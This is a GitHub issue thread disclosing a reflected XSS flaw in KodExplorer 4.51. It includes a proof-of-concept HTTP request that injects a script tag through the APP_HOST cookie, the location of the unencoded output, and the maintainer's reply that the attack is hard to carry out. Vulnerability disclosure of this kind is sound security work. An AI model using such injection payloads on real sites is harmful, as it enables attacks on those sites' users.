### ISSUE TITLE
KodExplorer 4.51 has a reflective XSS vulnerability

### ISSUE THREAD

**Issue by Hebing123** [kalcaddle/KodExplorer#526]
```
GET /index.php?user/login HTTP/1.1
Host: 192.168.160.130:6699
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: APP_HOST=http://192.168.160.130:6699/"><ScRiPt%20>alert(9876)</ScRiPt>
Upgrade-Insecure-Requests: 1
```
![image](https://github.com/kalcaddle/KodExplorer/assets/66168888/e4fecfa7-e229-46d3-849b-5944afadebdf)

The utilization method is relatively complex Need to modify the APP in the cookie header_ HOST, which can be done through HTML or other methods.

**Comment by Hebing123** [comment]
The vulnerability occurs on line 308 of config/i18n/en/main.php. 

The APP_HOST originating from the cookie was directly referenced into the page by% s without entity encoding.

**Comment by kalcaddle** [comment]
Modifying the server code requires relatively high permissions, and at this time, XXS has relatively high requirements, which is more difficult to form an attack.
